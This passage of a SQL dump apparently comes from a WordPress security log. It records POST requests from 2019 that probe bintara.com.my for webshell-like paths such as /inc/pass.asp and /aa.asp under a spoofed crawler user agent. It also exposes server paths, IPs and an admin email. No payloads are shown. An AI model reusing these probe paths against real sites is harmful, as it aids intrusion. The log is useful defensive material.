Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.200.139.32\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.200.139.32\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/inc/pass.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/inc/pass.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1V8H0ANMsr0w2B2wx@gAAAQk\";s:12:\"REDIRECT_URL\";s:13:\"/inc/pass.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"51521\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/inc/pass.asp\";s:10:\"SCRIPT_URL\";s:13:\"/inc/pass.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1V8H0ANMsr0w2B2wx@gAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419482.3633\";s:12:\"REQUEST_TIME\";s:10:\"1571419482\";}}','notice','2019-10-18 17:24:44','2019-10-18 17:24:42',35335744,37138536,'http://bintara.com.my//inc/pass.asp',1,0,'220.200.139.32'),(28325,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//inc/pass.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.39.146.73\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.39.146.73\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/inc/pass.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/inc/pass.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1YN@tMXWkyeodXCWMOQAAAYY\";s:12:\"REDIRECT_URL\";s:13:\"/inc/pass.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"51726\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/inc/pass.asp\";s:10:\"SCRIPT_URL\";s:13:\"/inc/pass.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1YN@tMXWkyeodXCWMOQAAAYY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419491.7788\";s:12:\"REQUEST_TIME\";s:10:\"1571419491\";}}','notice','2019-10-18 17:24:53','2019-10-18 17:24:52',35263312,37073528,'http://bintara.com.my//inc/pass.asp',1,0,'59.39.146.73'),(28326,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//Inc/east.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.192.217.31\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.192.217.31\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/Inc/east.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/Inc/east.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1asDvTLQMcXIRTTl1mQAAAgk\";s:12:\"REDIRECT_URL\";s:13:\"/Inc/east.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"51950\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/Inc/east.asp\";s:10:\"SCRIPT_URL\";s:13:\"/Inc/east.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1asDvTLQMcXIRTTl1mQAAAgk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419500.8194\";s:12:\"REQUEST_TIME\";s:10:\"1571419500\";}}','notice','2019-10-18 17:25:04','2019-10-18 17:25:01',35728584,37530584,'http://bintara.com.my//Inc/east.asp',1,0,'220.192.217.31'),(28327,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//Inc/east.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"122.64.76.90\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"122.64.76.90\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/Inc/east.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/Inc/east.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1c8DvTLQMcXIRTTl1ngAAAgo\";s:12:\"REDIRECT_URL\";s:13:\"/Inc/east.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"52206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/Inc/east.asp\";s:10:\"SCRIPT_URL\";s:13:\"/Inc/east.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1c8DvTLQMcXIRTTl1ngAAAgo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571419510.366\";s:12:\"REQUEST_TIME\";s:10:\"1571419510\";}}','notice','2019-10-18 17:25:12','2019-10-18 17:25:10',35263864,37068312,'http://bintara.com.my//Inc/east.asp',1,0,'122.64.76.90'),(28328,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"//aa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"825\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.232.75.250\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.232.75.250\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/aa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1fsH0ANMsr0w2B2wx-wAAARI\";s:12:\"REDIRECT_URL\";s:7:\"/aa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"52425\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:10:\"SCRIPT_URL\";s:7:\"/aa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1fsH0ANMsr0w2B2wx-wAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419523.9419\";s:12:\"REQUEST_TIME\";s:10:\"1571419523\";}}','notice','2019-10-18 17:25:26','2019-10-18 17:25:24',35339352,37151352,'http://bintara.com.my//aa.asp',1,0,'220.232.75.250'),(28329,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"//aa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"690\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.153.235.225\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.153.235.225\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/aa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan1h8H0ANMsr0w2B2wyAgAAARQ\";s:12:\"REDIRECT_URL\";s:7:\"/aa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"180.113.65.91\";s:11:\"REMOTE_PORT\";s:5:\"52720\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:10:\"SCRIPT_URL\";s:7:\"/aa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan1h8H0ANMsr0w2B2wyAgAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419527.5141\";s:12:\"REQUEST_TIME\";s:10:\"1571419527\";}}','notice','2019-10-18 17:25:29','2019-10-18 17:25:28',35263656,37060816,'http://bintara.com.my//aa.asp',1,0,'211.153.235.225'),(28330,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//image/check.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"222.172.247.123\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"222.172.247.123\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/image/check.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/image/check.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan2ko9Mb4wNxKVbgmYsEQAAAkc\";s:12:\"REDIRECT_URL\";s:16:\"/image/check.asp\";s:11:\"REMOTE_ADDR\";s:13:\"111.72.196.32\";s:11:\"REMOTE_PORT\";s:5:\"59432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/image/check.asp\";s:10:\"SCRIPT_URL\";s:16:\"/image/check.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan2ko9Mb4wNxKVbgmYsEQAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419794.9263\";s:12:\"REQUEST_TIME\";s:10:\"1571419794\";}}','notice','2019-10-18 17:29:59','2019-10-18 17:29:55',35730760,37536856,'http://bintara.com.my//image/check.asp',1,0,'222.172.247.123'),(28331,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//image/check.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.146.94.43\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.146.94.43\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/image/check.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/image/check.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan2mQZfHioVGWbjloHMVAAAANc\";s:12:\"REDIRECT_URL\";s:16:\"/image/check.asp\";s:11:\"REMOTE_ADDR\";s:13:\"111.72.196.32\";s:11:\"REMOTE_PORT\";s:5:\"59630\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/image/check.asp\";s:10:\"SCRIPT_URL\";s:16:\"/image/check.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan2mQZfHioVGWbjloHMVAAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419802.5154\";s:12:\"REQUEST_TIME\";s:10:\"1571419802\";}}','notice','2019-10-18 17:30:06','2019-10-18 17:30:03',35267960,37072448,'http://bintara.com.my//image/check.asp',1,0,'211.146.94.43'),(28332,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//dxyylc/md5.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.31.233.30\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.31.233.30\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan3KI9Mb4wNxKVbgmYsUwAAAlE\";s:12:\"REDIRECT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"REMOTE_ADDR\";s:14:\"175.11.214.146\";s:11:\"REMOTE_PORT\";s:5:\"63657\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan3KI9Mb4wNxKVbgmYsUwAAAlE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419944.9415\";s:12:\"REQUEST_TIME\";s:10:\"1571419944\";}}','notice','2019-10-18 17:32:28','2019-10-18 17:32:25',35264408,37071912,'http://bintara.com.my//dxyylc/md5.aspx',1,0,'218.31.233.30'),(28333,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//siteweb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 